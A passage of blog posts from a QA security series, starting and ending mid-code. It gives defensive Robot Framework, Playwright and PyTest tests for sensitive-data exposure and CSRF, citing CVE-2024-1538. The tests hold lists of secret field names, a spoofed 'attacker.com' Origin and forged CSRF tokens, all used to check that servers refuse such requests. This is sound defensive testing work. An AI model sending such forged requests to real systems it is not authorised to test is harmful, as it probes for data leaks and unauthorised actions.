class="p">.</span><span class="n">headers</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">"</span><span class="s">Set-Cookie</span><span class="sh">"</span><span class="p">,</span> <span class="sh">""</span><span class="p">),</span> \ <span class="sh">"</span><span class="s">Session cookie missing HttpOnly flag</span><span class="sh">"</span> </code></pre> </div> <h3> Robot Framework </h3> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>*** Settings *** Library RequestsLibrary Library Collections Library String *** Variables *** ${BASE_URL} https://your-app.com @{FORBIDDEN} password password_hash token secret ... api_key internal_id debug admin_notes ... stack trace last_login_ip @{ALLOWED_FIELDS} id name email created_at *** Test Cases *** User Response Contains No Forbidden Fields # CVE-2024-25124 pattern: assert absence of sensitive fields Create Session app ${BASE_URL} ${response}= GET On Session app /users/123 ${body}= Set Variable ${response.json()} FOR ${field} IN @{FORBIDDEN} Dictionary Should Not Contain Key ${body} ${field} ... msg=Sensitive field '${field}' exposed in response END User Response Schema Allowlist Enforced Create Session app ${BASE_URL} ${response}= GET On Session app /users/123 ${body}= Set Variable ${response.json()} ${keys}= Get Dictionary Keys ${body} FOR ${key} IN @{keys} Should Contain ${ALLOWED_FIELDS} ${key} ... msg=Unexpected field '${key}' found in response END Error Response Contains No Stack Trace Create Session app ${BASE_URL} ${response}= GET On Session app /users/invalid-id-trigger-500 ... expected_status=any ${body}= Set Variable ${response.text} Should Not Contain ${body} Traceback Should Not Contain ${body} at line Should Not Contain ${body} Exception Should Not Contain ${body} File " Should Not Contain ${body} sqlalchemy Should Not Contain ${body} psycopg2 CORS No Wildcard On Authenticated Endpoint # CVE-2024-25124: wildcard origin + credentials = data exposed ${headers}= Create Dictionary Origin=https://attacker.com Create Session app ${BASE_URL} ${response}= GET On Session app /users/123 headers=${headers} ${acao}= Get From Dictionary ${response.headers} ... Access-Control-Allow-Origin default=${EMPTY} Should Not Be Equal ${acao} * ... msg=Wildcard CORS on authenticated endpoint exposes data Security Headers Present And Disclosure Headers Absent Create Session app ${BASE_URL} ${response}= GET On Session app /users/123 Dictionary Should Not Contain Key ${response.headers} X-Powered-By Dictionary Should Not Contain Key ${response.headers} Server ${xcto}= Get From Dictionary ${response.headers} ... X-Content-Type-Options default=${EMPTY} Should Be Equal ${xcto} nosniff </code></pre> </div> <h3> TypeScript — Playwright API testing </h3> <div class="highlight js-code-highlight"> <pre class="highlight typescript"><code><span class="k">import</span> <span class="p">{</span> <span class="nx">test</span><span class="p">,</span> <span class="nx">expect</span><span class="p">,</span> <span class="nx">APIRequestContext</span> <span class="p">}</span> <span class="k">from</span> <span class="dl">'</span><span class="s1">@playwright/test</span><span class="dl">'</span><span class="p">;</span> <span class="kd">const</span> <span class="nx">FORBIDDEN_FIELDS</span> <span class="o">=</span> <span class="p">[</span> <span class="dl">'</span><span class="s1">password</span><span class="dl">'</span><span class="p">,</span> <span class="dl">'</span><span class="s1">password_hash</span><span class="dl">'</span><span class="p">,</span> <span class="dl">'</span><span class="s1">token</span><span class="dl">'</span><span class="p">,</span> <span class="dl">'</span><span class="s1">secret</span><span class="dl">'</span><span class="p">,</span> <span class="dl">'</span><span class="s1">api_key</span><span class="dl">'</span><span class="p">,</span> <span class="dl">'</span><span class="s1">internal_id</span><span class="dl">'</span><span class="p">,</span> <span class="dl">'</span><span class="s1">debug</span><span class="dl">'</span><span class="p">,</span> <span class="dl">'</span><span class="s1">admin_notes</span><span class="dl">'</span><span class="p">,</span> <span class="dl">'</span><span class="s1">stack</span><span class="dl">'</span><span class="p">,</span> <span class="dl">'</span><span class="s1">trace</span><span class="dl">'</span><span class="p">,</span> <span class="dl">'</span><span class="s1">last_login_ip</span><span class="dl">'</span> <span class="p">];</span> <span class="kd">const</span> <span class="nx">ALLOWED_USER_FIELDS</span> <span class="o">=</span> <span class="k">new</span> <span class="nc">Set</span><span class="p">([</span><span class="dl">'</span><span class="s1">id</span><span class="dl">'</span><span class="p">,</span> <span class="dl">'</span><span class="s1">name</span><span class="dl">'</span><span class="p">,</span> <span class="dl">'</span><span class="s1">email</span><span class="dl">'</span><span class="p">,</span> <span class="dl">'</span><span class="s1">created_at</span><span class="dl">'</span><span class="p">]);</span> <span class="kd">const</span> <span class="nx">STACK_TRACE_MARKERS</span> <span class="o">=</span> <span class="p">[</span> <span class="dl">'</span><span class="s1">Traceback</span><span class="dl">'</span><span class="p">,</span> <span class="dl">'</span><span class="s1">at line</span><span class="dl">'</span><span class="p">,</span> <span class="dl">'</span><span class="s1">Exception</span><span class="dl">'</span><span class="p">,</span> <span class="dl">'</span><span class="s1">File "</span><span class="dl">'</span><span class="p">,</span> <span class="dl">'</span><span class="s1">django</span><span class="dl">'</span><span class="p">,</span> <span class="dl">'</span><span class="s1">sqlalchemy</span><span class="dl">'</span><span class="p">,</span> <span class="dl">'</span><span class="s1">psycopg2</span><span class="dl">'</span><span class="p">,</span> <span class="dl">'</span><span class="s1">pymongo</span><span class="dl">'</span> <span class="p">];</span> <span class="kd">let</span> <span class="nx">apiContext</span><span class="p">:</span> <span class="nx">APIRequestContext</span><span class="p">;</span> <span class="nx">test</span><span class="p">.</span><span class="nf">beforeAll</span><span class="p">(</span><span class="k">async </span><span class="p">({</span> <span class="nx">playwright</span> <span class="p">})</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="nx">apiContext</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">playwright</span><span class="p">.</span><span class="nx">request</span><span class="p">.</span><span class="nf">newContext</span><span class="p">({</span> <span class="na">baseURL</span><span class="p">:</span> <span class="dl">'</span><span class="s1">https://your-app.com</span><span class="dl">'</span><span class="p">,</span> <span class="p">});</span> <span class="k">await</span> <span class="nx">apiContext</span><span class="p">.</span><span class="nf">post</span><span class="p">(</span><span class="dl">'</span><span class="s1">/login</span><span class="dl">'</span><span class="p">,</span> <span class="p">{</span> <span class="na">data</span><span class="p">:</span> <span class="p">{</span> <span class="na">username</span><span class="p">:</span> <span class="dl">'</span><span class="s1">testuser</span><span class="dl">'</span><span class="p">,</span> <span class="na">password</span><span class="p">:</span> <span class="dl">'</span><span class="s1">test_password</span><span class="dl">'</span> <span class="p">}</span> <span class="p">});</span> <span class="p">});</span> <span class="nx">test</span><span class="p">.</span><span class="nf">afterAll</span><span class="p">(</span><span class="k">async </span><span class="p">()</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="k">await</span> <span class="nx">apiContext</span><span class="p">.</span><span class="nf">dispose</span><span class="p">();</span> <span class="p">});</span> <span class="nf">test</span><span class="p">(</span><span class="dl">'</span><span class="s1">user response — no forbidden fields exposed</span><span class="dl">'</span><span class="p">,</span> <span class="k">async </span><span class="p">()</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="c1">// CVE-2024-25124 pattern: assert what must NOT be in the response</span> <span class="kd">const</span> <span class="nx">response</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">apiContext</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="dl">'</span><span class="s1">/users/123</span><span class="dl">'</span><span class="p">);</span> <span class="kd">const</span> <span class="nx">body</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">response</span><span class="p">.</span><span class="nf">json</span><span class="p">();</span> <span class="kd">const</span> <span class="nx">exposed</span> <span class="o">=</span> <span class="nx">FORBIDDEN_FIELDS</span><span class="p">.</span><span class="nf">filter</span><span class="p">(</span><span class="nx">field</span> <span class="o">=&gt;</span> <span class="nx">field</span> <span class="k">in</span> <span class="nx">body</span><span class="p">);</span> <span class="nf">expect</span><span class="p">(</span><span class="nx">exposed</span><span class="p">,</span> <span class="s2">`Sensitive fields exposed: </span><span class="p">${</span><span class="nx">exposed</span><span class="p">.</span><span class="nf">join</span><span class="p">(</span><span class="dl">'</span><span class="s1">, </span><span class="dl">'</span><span class="p">)}</span><span class="s2">`</span><span class="p">).</span><span class="nf">toHaveLength</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span> <span class="p">});</span> <span class="nf">test</span><span class="p">(</span><span class="dl">'</span><span class="s1">user response — schema allowlist enforced</span><span class="dl">'</span><span class="p">,</span> <span class="k">async </span><span class="p">()</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="c1">// any field outside the allowlist is a contract violation</span> <span class="kd">const</span> <span class="nx">response</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">apiContext</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="dl">'</span><span class="s1">/users/123</span><span class="dl">'</span><span class="p">);</span> <span class="kd">const</span> <span class="nx">body</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">response</span><span class="p">.</span><span class="nf">json</span><span class="p">();</span> <span class="kd">const</span> <span class="nx">unexpected</span> <span class="o">=</span> <span class="nb">Object</span><span class="p">.</span><span class="nf">keys</span><span class="p">(</span><span class="nx">body</span><span class="p">).</span><span class="nf">filter</span><span class="p">(</span><span class="nx">key</span> <span class="o">=&gt;</span> <span class="o">!</span><span class="nx">ALLOWED_USER_FIELDS</span><span class="p">.</span><span class="nf">has</span><span class="p">(</span><span class="nx">key</span><span class="p">));</span> <span class="nf">expect</span><span class="p">(</span><span class="nx">unexpected</span><span class="p">,</span> <span class="s2">`Unexpected fields in response: </span><span class="p">${</span><span class="nx">unexpected</span><span class="p">.</span><span class="nf">join</span><span class="p">(</span><span class="dl">'</span><span class="s1">, </span><span class="dl">'</span><span class="p">)}</span><span class="s2">`</span><span class="p">).</span><span class="nf">toHaveLength</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span> <span class="p">});</span> <span class="nf">test</span><span class="p">(</span><span class="dl">'</span><span class="s1">error response — no stack trace in body</span><span class="dl">'</span><span class="p">,</span> <span class="k">async </span><span class="p">()</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="c1">// deliberately trigger a server error, assert clean generic message</span> <span class="kd">const</span> <span class="nx">response</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">apiContext</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="dl">'</span><span class="s1">/users/invalid-id-trigger-500</span><span class="dl">'</span><span class="p">);</span> <span class="kd">const</span> <span class="nx">body</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">response</span><span class="p">.</span><span class="nf">text</span><span class="p">();</span> <span class="k">for </span><span class="p">(</span><span class="kd">const</span> <span class="nx">marker</span> <span class="k">of</span> <span class="nx">STACK_TRACE_MARKERS</span><span class="p">)</span> <span class="p">{</span> <span class="nf">expect</span><span class="p">(</span><span class="nx">body</span><span class="p">,</span> <span class="s2">`Stack trace marker '</span><span class="p">${</span><span class="nx">marker</span><span class="p">}</span><span class="s2">' found in error response`</span><span class="p">)</span> <span class="p">.</span><span class="nx">not</span><span class="p">.</span><span class="nf">toContain</span><span class="p">(</span><span class="nx">marker</span><span class="p">);</span> <span class="p">}</span> <span class="p">});</span> <span class="nf">test</span><span class="p">(</span><span class="dl">'</span><span class="s1">CORS — no wildcard origin on authenticated endpoint</span><span class="dl">'</span><span class="p">,</span> <span class="k">async </span><span class="p">()</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="c1">// CVE-2024-25124: wildcard + credentials = any origin reads response</span> <span class="kd">const</span> <span class="nx">response</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">apiContext</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="dl">'</span><span class="s1">/users/123</span><span class="dl">'</span><span class="p">,</span> <span class="p">{</span> <span class="na">headers</span><span class="p">:</span> <span class="p">{</span> <span class="dl">'</span><span class="s1">Origin</span><span class="dl">'</span><span class="p">:</span> <span class="dl">'</span><span class="s1">https://attacker.com</span><span class="dl">'</span> <span class="p">}</span> <span class="p">});</span> <span class="kd">const</span> <span class="nx">acao</span> <span class="o">=</span> <span class="nx">response</span><span class="p">.</span><span class="nf">headers</span><span class="p">()[</span><span class="dl">'</span><span class="s1">access-control-allow-origin</span><span class="dl">'</span><span class="p">]</span> <span class="o">??</span> <span class="dl">''</span><span class="p">;</span> <span class="nf">expect</span><span class="p">(</span><span class="nx">acao</span><span class="p">,</span> <span class="dl">'</span><span class="s1">Wildcard CORS on authenticated endpoint exposes data</span><span class="dl">'</span><span class="p">)</span> <span class="p">.</span><span class="nx">not</span><span class="p">.</span><span class="nf">toBe</span><span class="p">(</span><span class="dl">'</span><span class="s1">*</span><span class="dl">'</span><span class="p">);</span> <span class="p">});</span> <span class="nf">test</span><span class="p">(</span><span class="dl">'</span><span class="s1">security headers — disclosure headers absent</span><span class="dl">'</span><span class="p">,</span> <span class="k">async </span><span class="p">()</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">response</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">apiContext</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="dl">'</span><span class="s1">/users/123</span><span class="dl">'</span><span class="p">);</span> <span class="kd">const</span> <span class="nx">headers</span> <span class="o">=</span> <span class="nx">response</span><span class="p">.</span><span class="nf">headers</span><span class="p">();</span> <span class="nf">expect</span><span class="p">(</span><span class="nx">headers</span><span class="p">[</span><span class="dl">'</span><span class="s1">x-powered-by</span><span class="dl">'</span><span class="p">],</span> <span class="dl">'</span><span class="s1">X-Powered-By discloses server technology</span><span class="dl">'</span><span class="p">)</span> <span class="p">.</span><span class="nf">toBeUndefined</span><span class="p">();</span> <span class="nf">expect</span><span class="p">(</span><span class="nx">headers</span><span class="p">[</span><span class="dl">'</span><span class="s1">x-content-type-options</span><span class="dl">'</span><span class="p">]).</span><span class="nf">toBe</span><span class="p">(</span><span class="dl">'</span><span class="s1">nosniff</span><span class="dl">'</span><span class="p">);</span> <span class="p">});</span> <span class="nf">test</span><span class="p">(</span><span class="dl">'</span><span class="s1">session cookie — Secure and HttpOnly flags present</span><span class="dl">'</span><span class="p">,</span> <span class="k">async </span><span class="p">()</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">response</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">apiContext</span><span class="p">.</span><span class="nf">post</span><span class="p">(</span><span class="dl">'</span><span class="s1">/login</span><span class="dl">'</span><span class="p">,</span> <span class="p">{</span> <span class="na">data</span><span class="p">:</span> <span class="p">{</span> <span class="na">username</span><span class="p">:</span> <span class="dl">'</span><span class="s1">testuser</span><span class="dl">'</span><span class="p">,</span> <span class="na">password</span><span class="p">:</span> <span class="dl">'</span><span class="s1">test_password</span><span class="dl">'</span> <span class="p">}</span> <span class="p">});</span> <span class="kd">const</span> <span class="nx">setCookie</span> <span class="o">=</span> <span class="nx">response</span><span class="p">.</span><span class="nf">headers</span><span class="p">()[</span><span class="dl">'</span><span class="s1">set-cookie</span><span class="dl">'</span><span class="p">]</span> <span class="o">??</span> <span class="dl">''</span><span class="p">;</span> <span class="nf">expect</span><span class="p">(</span><span class="nx">setCookie</span><span class="p">,</span> <span class="dl">'</span><span class="s1">Session cookie missing Secure flag</span><span class="dl">'</span><span class="p">).</span><span class="nf">toContain</span><span class="p">(</span><span class="dl">'</span><span class="s1">Secure</span><span class="dl">'</span><span class="p">);</span> <span class="nf">expect</span><span class="p">(</span><span class="nx">setCookie</span><span class="p">,</span> <span class="dl">'</span><span class="s1">Session cookie missing HttpOnly flag</span><span class="dl">'</span><span class="p">).</span><span class="nf">toContain</span><span class="p">(</span><span class="dl">'</span><span class="s1">HttpOnly</span><span class="dl">'</span><span class="p">);</span> <span class="p">});</span> </code></pre> </div> <p>Run data exposure tests in isolation:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>npx playwright <span class="nb">test</span> <span class="nt">--grep</span> <span class="s2">"CORS|schema|forbidden|stack trace|cookie"</span> </code></pre> </div> <h3> CI/CD gate </h3> <div class="highlight js-code-highlight"> <pre class="highlight yaml"><code><span class="na">sensitive-data-exposure-tests</span><span class="pi">:</span> <span class="na">stage</span><span class="pi">:</span> <span class="s">test</span> <span class="na">script</span><span class="pi">:</span> <span class="pi">-</span> <span class="s">pytest tests/security/test_data_exposure.py -v</span> <span class="pi">-</span> <span class="s">npx playwright test --grep "CORS|schema|forbidden"</span> <span class="na">rules</span><span class="pi">:</span> <span class="pi">-</span> <span class="na">if</span><span class="pi">:</span> <span class="s1">'</span><span class="s">$CI_PIPELINE_SOURCE</span><span class="nv"> </span><span class="s">==</span><span class="nv"> </span><span class="s">"merge_request_event"'</span> <span class="na">allow_failure</span><span class="pi">:</span> <span class="kc">false</span> </code></pre> </div> <p>Pair with a Semgrep rule that flags direct model serialization without a DTO layer — the static check catches the pattern before deployment, the runtime tests confirm enforcement in the running application.</p> <h3> Environment note </h3> <p>Sensitive data exposure behaves differently across environments because debug settings change between development and production. A stack trace that appears in staging because <code>DEBUG=True</code> never makes it to production if someone remembered to flip the flag — but the test only ran in staging, so the gap is invisible.</p> <p>Always run response content validation tests against a production-mirrored environment with debug mode explicitly disabled.</p> <p>🔬 <strong>Practice this yourself:</strong> <a href="https://yuriysafron.com/qa-sandbox/sensitive-data/" rel="noopener noreferrer">yuriysafron.com/qa-sandbox</a></p> <h2> Why AI fails here </h2> <p>When a team asks GitHub Copilot to write tests for a user profile endpoint, it writes tests that assert the response contains the correct name, email, and profile fields. The tests pass. The suite is green.</p> <p>Nobody generated a test that asserts the response does not also contain <code>password_hash</code>, <code>internal_user_id</code>, or a debug object left in the serializer six months ago.</p> <p>The structural reason LLMs fail at this class: <strong>sensitive data exposure is defined by what should not be present, not by what should.</strong> LLMs generate tests by modeling the expected output of a function. They do not model the set of all outputs that would constitute a violation.</p> <p>Testing for absence requires knowing the full allowlist of permitted data — a design decision that lives outside the code itself. No amount of reading the handler implementation tells you that the password field should never appear in the response, because that information lives in a compliance document or a threat model, not in the source code.</p> <p>The concrete failure: a team builds a user management API. Copilot generates a full test suite. Every endpoint is covered. Three months after launch, a security researcher reports that <code>GET /users/:id</code> returns a hashed password and a <code>last_login_ip</code> field. The AI generated suite asserted the name and email were correct. It never asserted those two fields were absent. The data had been in every response since the first deployment. No test had ever looked for it.</p> <h2> How to prevent </h2> <p><strong>1. Response allowlist at the serialization layer</strong> - every API response must pass through a DTO that explicitly enumerates the fields allowed in the output. Nothing from the underlying domain model reaches the client unless it was deliberately placed in the DTO. Making implicit serialization impossible in your framework configuration means returning a raw model object is a runtime error, not a silent data leak.</p> <p><strong>2. Error response hardening</strong> — error handlers must return a generic message. Stack traces, exception class names, file paths, database driver information, and ORM query strings must never reach the client. This must be tested explicitly in CI against a production-mirrored environment with debug mode disabled.</p> <p><strong>3. Header security as a pipeline gate</strong> — every deployment must pass a header check that validates required security headers and the absence of disclosure headers. CORS headers must be validated against a known allowlist of permitted origins for every authenticated endpoint. This runs as a blocking post-deployment check, not a manual review before release.</p> <p>Prevention only works when it is tested. A DTO layer that exists is not the same as a DTO layer that is verified to contain only the fields it should. The test suite is the enforcement mechanism. Without it, the prevention is a convention, not a guarantee.</p> <h2> Conclusion </h2> <p>Working on a cybersecurity platform protecting U.S. critical infrastructure and multiple branches of the U.S. military sharpens your sense of what "sensitive" means in practice. In those environments, a leaked internal ID is not a minor finding. It is reconnaissance.</p> <p>Sensitive Data Exposure separates teams who think about what their API must <strong>return</strong> from teams who think only about what their API must <strong>do</strong>. The second group ships data they never intended to expose.</p> <p>Always in a field nobody thought to look for. Always in a response that was otherwise working perfectly.</p> <p><em>When did your team last audit your API responses for fields that should not be there and do you have a test that would catch a new one being added tomorrow?</em></p> <p><em>Part of the **Break It on Purpose</em>* series, published weekly for QA <br> engineers and SDETs who find bugs before attackers do.*</p> <p>🔬 Practice sandbox: <a href="https://yuriysafron.com/qa-sandbox/sensitive-data/" rel="noopener noreferrer">yuriysafron.com/qa-sandbox</a><br><br> 🔗 <a href="https://linkedin.com/in/yuriysafronnynov" rel="noopener noreferrer">linkedin.com/in/yuriy-safronnynov</a></p> security testing python webdev Yuriy Safronnynov Sun, 12 Apr 2026 14:00:00 +0000 https://forem.com/ysafron/csrf-the-bug-that-looks-like-legitimate-traffic-1l55 https://forem.com/ysafron/csrf-the-bug-that-looks-like-legitimate-traffic-1l55 <p>Your admin panel processes a state-changing request. The user is authenticated. The session cookie is valid. The server accepts it. The attacker wins.</p> <p>This is not a dramatic exploit. It is the server doing its job, faithfully executing a request it was never supposed to accept, because nobody thought to ask where the request actually came from.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fy2lfv5pohovmfoulhzkc.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fy2lfv5pohovmfoulhzkc.png" alt="Vulnerable Path, CSRF Attack Flow, Secure Path" width="800" height="417"></a></p> <h2> TL;DR </h2> <ul> <li>CSRF lets an attacker forge authenticated requests from a victim's browser. The server sees a valid session and executes the action.</li> <li>CVE-2024-1538 exposed over 1 million WordPress sites via missing nonce validation. CVSS 8.8. Patched in File Manager 7.2.5.</li> <li>Happy-path tests never catch this. You have to explicitly test the rejection path: missing token, invalid token, no state mutation.</li> <li>Three layers of prevention: synchronizer tokens at middleware level, SameSite cookie attributes, Origin header validation.</li> <li>AI-generated test suites create false confidence here. They test the correct flow, not the forged one.</li> </ul> <h2> What it is </h2> <p>Cross-Site Request Forgery tricks an authenticated user's browser into sending a request to your application on behalf of an attacker. The browser does what browsers do: it automatically attaches session cookies to every request. The server sees a valid cookie and processes the request. The user never saw the form that submitted it.</p> <p>The technical condition that makes this possible: HTTP cookies are sent automatically on every matching request regardless of origin. If your server does not verify that a state-changing request came from your own application, any page on the web can forge one.</p> <p>Developers introduce this without malice. They build the happy path, test the happy path, and ship the happy path. Cross-origin validation is not something most developers think about while building a file rename feature. In code review, reviewers look for logic errors, but never for the presence of CSRF tokens on every mutating endpoint.</p> <p>The attack surface is the assumption that <strong>authenticated</strong> means <strong>authorized-to-have-submitted-this-form</strong>.</p> <h2> Real world damage </h2> <p><strong>CVE-2024-1538 · WordPress File Manager · March 2024 · CVSS 8.8</strong></p> <p>In March 2024, a CSRF vulnerability was disclosed in the WordPress File Manager plugin, active on over 1 million websites. The flaw stemmed from missing nonce validation on the <code>wp_file_manager</code> page when handling the <code>lang</code> parameter.</p> <p>An attacker could trick an authenticated administrator into clicking a crafted link, which would include a local JavaScript file into the application and open the door to remote code execution.</p> <p>No credentials required. No brute force. Only a logged-in admin who <br> clicked something.</p> <blockquote> <p>Source: <a href="https://nvd.nist.gov/vuln/detail/CVE-2024-1538" rel="noopener noreferrer">NVD CVE-2024-1538</a>, <br> published March 21, 2024. Affected all versions up to 7.2.4. <br> Patched in 7.2.5. Credit: Wordfence for responsible disclosure.</p> </blockquote> <p>A QA engineer running cross-origin state-change tests before 7.2.5 <br> would have caught this. The test is not complex: submit a mutating <br> request with a missing or incorrect nonce and assert the server rejects it. That test did not exist. The vulnerability shipped to a million sites.</p> <h2> The invisible bug problem </h2> <p>Happy-path tests authenticate as a real user and send requests exactly as the application intends. That is the problem. <br> CSRF is not about whether the endpoint works correctly for a legitimate request. It is about whether the server validates that the request is legitimate at all.</p> <p>Your test suite exercises the authenticated user path and passes. The attack exploits the same path from an external origin and also passes, from the server's perspective.</p> <p>The bug only surfaces when the test asks a different question:</p> <blockquote> <p>Does this endpoint accept a state-changing request that arrives <br> without a valid CSRF token?</p> </blockquote> <p>Standard test suites never ask that. They test that the endpoint <br> responds correctly. They do not test that the endpoint <strong>refuses incorrectly</strong>.</p> <h2> How QA engineers catch it </h2> <p>The core principle: every state-changing endpoint must reject requests that arrive without a valid CSRF token. Your suite needs to verify the <strong>rejection path</strong>, not just the success path.</p> <h3> PyTest </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="kn">import</span> <span class="n">pytest</span> <span class="kn">import</span> <span class="n">requests</span> <span class="n">BASE_URL</span> <span class="o">=</span> <span class="sh">"</span><span class="s">https://your-app.com</span><span class="sh">"</span> <span class="nd">@pytest.fixture</span> <span class="k">def</span> <span class="nf">auth_session</span><span class="p">():</span> <span class="n">session</span> <span class="o">=</span> <span class="n">requests</span><span class="p">.</span><span class="nc">Session</span><span class="p">()</span> <span class="n">session</span><span class="p">.</span><span class="nf">post</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="si">{</span><span class="n">BASE_URL</span><span class="si">}</span><span class="s">/login</span><span class="sh">"</span><span class="p">,</span> <span class="n">json</span><span class="o">=</span><span class="p">{</span> <span class="sh">"</span><span class="s">username</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">admin</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">password</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">test_password</span><span class="sh">"</span> <span class="p">})</span> <span class="k">return</span> <span class="n">session</span> <span class="k">def</span> <span class="nf">test_csrf_empty_token_returns_403</span><span class="p">(</span><span class="n">auth_session</span><span class="p">):</span> <span class="c1"># CVE-2024-1538 pattern: missing nonce = server must reject </span> <span class="n">response</span> <span class="o">=</span> <span class="n">auth_session</span><span class="p">.</span><span class="nf">post</span><span class="p">(</span> <span class="sa">f</span><span class="sh">"</span><span class="si">{</span><span class="n">BASE_URL</span><span class="si">}</span><span class="s">/admin/file/rename</span><span class="sh">"</span><span class="p">,</span> <span class="n">json</span><span class="o">=</span><span class="p">{</span><span class="sh">"</span><span class="s">old_name</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">file.txt</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">new_name</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">hacked.txt</span><span class="sh">"</span><span class="p">},</span> <span class="n">headers</span><span class="o">=</span><span class="p">{</span><span class="sh">"</span><span class="s">X-CSRF-Token</span><span class="sh">"</span><span class="p">:</span> <span class="sh">""</span><span class="p">}</span> <span class="p">)</span> <span class="k">assert</span> <span class="n">response</span><span class="p">.</span><span class="n">status_code</span> <span class="o">==</span> <span class="mi">403</span> <span class="k">def</span> <span class="nf">test_csrf_forged_token_returns_403</span><span class="p">(</span><span class="n">auth_session</span><span class="p">):</span> <span class="c1"># attacker-controlled token value must be rejected </span> <span class="n">response</span> <span class="o">=</span> <span class="n">auth_session</span><span class="p">.</span><span class="nf">post</span><span class="p">(</span> <span class="sa">f</span><span class="sh">"</span><span class="si">{</span><span class="n">BASE_URL</span><span class="si">}</span><span class="s">/admin/file/rename</span><span class="sh">"</span><span class="p">,</span> <span class="n">json</span><span class="o">=</span><span class="p">{</span><span class="sh">"</span><span class="s">old_name</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">file.txt</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">new_name</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">hacked.txt</span><span class="sh">"</span><span class="p">},</span> <span class="n">headers</span><span class="o">=</span><span class="p">{</span><span class="sh">"</span><span class="s">X-CSRF-Token</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">attacker-forged-token-abc123</span><span class="sh">"</span><span class="p">}</span> <span class="p">)</span> <span class="k">assert</span> <span class="n">response</span><span class="p">.</span><span class="n">status_code</span> <span class="o">==</span> <span class="mi">403</span> <span class="k">def</span> <span class="nf">test_csrf_no_state_mutation</span><span class="p">(</span><span class="n">auth_session</span><span class="p">):</span> <span class="c1"># 403 is necessary but not sufficient — assert state did not change </span> <span class="n">auth_session</span><span class="p">.</span><span class="nf">post</span><span class="p">(</span> <span class="sa">f</span><span class="sh">"</span><span class="si">{</span><span class="n">BASE_URL</span><span class="si">}</span><span class="s">/admin/file/rename</span><span class="sh">"</span><span class="p">,</span> <span class="n">json</span><span class="o">=</span><span class="p">{</span><span class="sh">"</span><span class="s">old_name</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">file.txt</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">new_name</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">hacked.txt</span><span class="sh">"</span><span class="p">},</span> <span class="n">headers</span><span class="o">=</span><span class="p">{</span><span class="sh">"</span><span class="s">X-CSRF-Token</span><span class="sh">"</span><span class="p">:</span> <span class="sh">""</span><span class="p">}</span> <span class="p">)</span> <span class="n">response</span> <span class="o">=</span> <span class="n">auth_session</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="si">{</span><span class="n">BASE_URL</span><span class="si">}</span><span class="s">/admin/files</span><span class="sh">"</span><span class="p">)</span> <span class="n">files</span> <span class="o">=</span> <span class="n">response</span><span class="p">.</span><span class="nf">json</span><span class="p">()[</span><span class="sh">"</span><span class="s">files</span><span class="sh">"</span><span class="p">]</span> <span class="k">assert</span> <span class="sh">"</span><span class="s">hacked.txt</span><span class="sh">"</span> <span class="ow">not</span> <span class="ow">in</span> <span class="n">files</span> <span class="k">assert</span> <span class="sh">"</span><span class="s">file.txt</span><span class="sh">"</span> <span class="ow">in</span> <span class="n">files</span> </code></pre> </div> <p>A 403 status is necessary but not sufficient. If the server returns 403 but still processes the action, you have a different kind of bug. <br> <strong>Assert the state, not just the status.</strong></p> <h3> Robot Framework </h3> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>*** Settings *** Library RequestsLibrary *** Variables *** ${BASE_URL} https://your-app.com *** Test Cases *** CSRF Empty Token On File Rename Returns 403 # CVE-2024-1538: missing nonce on file manager endpoint Create Session app ${BASE_URL} ${headers}= Create Dictionary X-CSRF-Token=${EMPTY} ${response}= POST On Session 